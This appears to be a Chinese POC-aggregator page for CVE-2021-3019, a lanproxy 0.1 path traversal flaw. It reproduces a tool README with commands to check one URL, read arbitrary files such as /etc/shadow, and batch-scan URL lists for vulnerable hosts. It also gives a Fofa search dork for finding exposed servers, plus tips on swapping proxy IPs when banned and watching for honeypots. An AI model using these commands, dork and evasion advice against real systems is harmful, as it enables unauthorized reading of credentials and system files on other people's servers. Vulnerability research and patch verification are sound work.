POC详情: 015298a346c50327f10ab6304fd8737c306a0acf

来源
关联漏洞
标题: Ffay Lanproxy 路径遍历漏洞 (CVE-2021-3019)
描述:Ffay Lanproxy是Ffay个人开发者的一个可将局域网内服务代理到公网的内网穿透工具。 ffay lanproxy 0.1 存在路径遍历漏洞,该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。
描述
CVE-2021-3019 lanproxy目录遍历任意文件读取漏洞探测POC
介绍
# CVE-2021-3019
CVE-2021-3019 lanproxy目录遍历任意文件读取漏洞

![payload](./imgs/payload.png)

## 使用方法

### 下载

```zsh
git clone https://github.com/FanqXu/CVE-2021-3019.git
cd CVE-2021-3019
```

### 帮助

默认不带参数运行显示帮助信息

![help](./imgs/help.png)

### 单个URL

对单个URL进行漏洞检测,如果存在漏洞则默认读取配置文件并输出

```zsh
python3 POC.py -u http://127.0.0.1:9100
```

![singeUrl](./imgs/singeUrl.png)

### 读取其他文件

使用`-r`参数读取系统其他文件,需要知道文件的绝对路径

```zsh
python3 POC.py -u http://127.0.0.1:9100 -r /etc/shadow
```

![readOtherFile](./imgs/readOtherFile.png)

### 批量扫描

使用`-f`参数批量检测,有漏洞的将被写入`success.txt`文件

```zsh
python3 POC.py -f urls.txt
```

![files](./imgs/files.png)

## 其他问题

### Fofa Dork

"Server: LPS-0.1" && title=="登录"

### IP被禁

当出现 `Connection reset by peer` 时,极大可能是被目标服务器禁了IP,切换个代理IP即可。

### 注意蜜罐
文件快照

[4.0K] /data/pocs/015298a346c50327f10ab6304fd8737c306a0acf ├── [4.0K] imgs │   ├── [980K] files.png │   ├── [780K] help.png │   ├── [123K] payload.png │   ├── [762K] readOtherFile.png │   └── [735K] singeUrl.png ├── [4.6K] POC.py └── [1.1K] README.md 1 directory, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。